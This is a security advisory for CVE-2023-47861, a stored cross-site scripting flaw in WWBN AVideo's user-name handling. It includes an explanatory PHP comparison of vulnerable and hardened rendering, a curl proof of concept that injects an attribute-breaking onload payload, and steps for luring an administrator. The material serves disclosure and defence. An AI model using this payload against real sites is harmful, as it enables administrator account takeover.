CVSS3: 9 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
AI Score: 5.8 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 37.9%)
CVE-2023-47861
A cross-site scripting (XSS) vulnerability exists in the channelBody.php user name functionality of WWBN AVideo 11.6 and dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary JavaScript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
WWBN AVideo 11.6
WWBN AVideo dev master commit 15fed957fb
AVideo - <https://github.com/WWBN/AVideo>
9.0 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.
The PHP file view/channelBody.php is vulnerable to an XSS issue due to improper sanitization of the user name. channelBody.php is included by channel.php:
include $global['systemRootPath'] . 'view/channelBody.php';
Inside channelBody.php, the user photo is shown:
} else {
?>
<div></div>
<a href target="_blank">
[1] <img src alt="<?php echo $user->_getName(); ?>" />
</a>
<?php
}
At [1], the user name is echoed using $user->_getName():
public function _getName()
{
return $this->name;
}
This function simply returns the name field of the User object. The name field is originally set using setName:
public function setName($name)
{
$this->name = strip_tags($name);
}
strip_tags is used to remove tags, which could otherwise be used to inject arbitrary JavaScript. However, since the user name is echoed inside the attribute of an <img> tag, there is no need to inject tags in order to execute arbitrary JavaScript: closing the attribute value and adding an event-handler attribute is enough. For example, a privileged attacker could change their user name to someuser" onload="alert(1), which would execute alert(1) without using tags and thus bypass the strip_tags call in setName.
Exploitation leads to a straightforward stored cross-site scripting issue (XSS) when visiting a user’s channel. This can be used by an attacker, in the worst case, to take over an administrator account, for example by tricking an administrator into browsing the attacker’s channel.
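As an added illustration written for this page (not AVideo's code), the PHP script below reproduces the pattern the advisory describes: strip_tags() applied when the name is stored, then a raw echo inside alt="..." when it is rendered. Next to it is a hardened render function that encodes the value for the HTML attribute context at output time, and a DOMDocument-based check that shows whether an HTML parser would see an onload attribute in the resulting markup. The two render helpers, the avatar path and the sample name are constructed for this example.

```php
<?php
// Added example for this page; not part of AVideo. Demonstrates why strip_tags()
// does not neutralise input that is later echoed inside an HTML attribute, and
// what output-context encoding does instead.
declare(strict_types=1);

// Constructed sample user name, shaped like the one in the advisory.
const SAMPLE_NAME = 'someuser" onload="alert(1)';

// Mirrors the advisory's pattern: strip_tags() at input time (as in setName),
// then a raw echo into alt="..." at output time (as at [1] in channelBody.php).
// The avatar path is a constructed placeholder.
function renderImgVulnerable(string $name): string
{
    $stored = strip_tags($name);   // removes <...> sequences only; the sample has none, so it is unchanged
    return '<img src="avatar.png" alt="' . $stored . '" />';
}

// Hardened variant: keep whatever input filtering exists, but encode for the
// attribute context where the value is actually emitted. ENT_QUOTES turns both
// " and ' into entities, so the attribute value cannot be closed early.
function renderImgHardened(string $name): string
{
    $stored  = strip_tags($name);
    $escaped = htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="avatar.png" alt="' . $escaped . '" />';
}

// Parse the markup the way a browser would and report whether the <img>
// element ends up carrying an onload attribute.
function imgHasOnload(string $html): bool
{
    $dom = new DOMDocument();
    // Suppress warnings about fragments; wrap so the parser has a body.
    @$dom->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $img = $dom->getElementsByTagName('img')->item(0);
    return $img !== null && $img->hasAttribute('onload');
}

// Parsed value of the alt attribute, to show that encoding preserves the
// original characters as data rather than dropping them.
function imgAltValue(string $html): ?string
{
    $dom = new DOMDocument();
    @$dom->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $img = $dom->getElementsByTagName('img')->item(0);
    return $img === null ? null : $img->getAttribute('alt');
}

$vuln = renderImgVulnerable(SAMPLE_NAME);
$safe = renderImgHardened(SAMPLE_NAME);

echo "strip_tags() result : ", strip_tags(SAMPLE_NAME), PHP_EOL;
echo "vulnerable markup   : ", $vuln, PHP_EOL;
echo "  onload present?   : ", var_export(imgHasOnload($vuln), true), PHP_EOL;
echo "  parsed alt        : ", $altVuln = imgAltValue($vuln), PHP_EOL;
echo "hardened markup     : ", $safe, PHP_EOL;
echo "  onload present?   : ", var_export(imgHasOnload($safe), true), PHP_EOL;
echo "  parsed alt        : ", $altSafe = imgAltValue($safe), PHP_EOL;
```

The point the script makes is that the fix belongs at the output site, not only at the input site: strip_tags() is a tag filter, and the injected string contains no tags, so it passes through unchanged and the parser splits it into two attributes. With htmlspecialchars() and ENT_QUOTES the same stored value stays a single alt attribute whose decoded text is the user's name verbatim, so nothing legitimate is lost.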
This proof-of-concept calls alert(1):
$ curl -k $'https://localhost/objects/userUpdate.json.php' \
-H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=bir8alr05n4s0tjaqninjjnr66' \
-H 'Referer: https://localhost/user' \
--data-raw $'user=user1&pass=&email=user1@localhost&phone=&name=someuser" onload="alert(1)&about=&channelName=User1&donationLink=&analyticsCode='
{"error":false,"msg":"","users_id":2}
Note the user id is 2.
Trick the administrator into visiting the attacker's channel by clicking the following URL, which will execute alert(1):
https://localhost/view/channel.php?channelName=2
Make sure to use the user id (2 in this case) for channelName.
2023-12-14 - Vendor Disclosure
2023-12-15 - Vendor Patch Release
2024-01-10 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.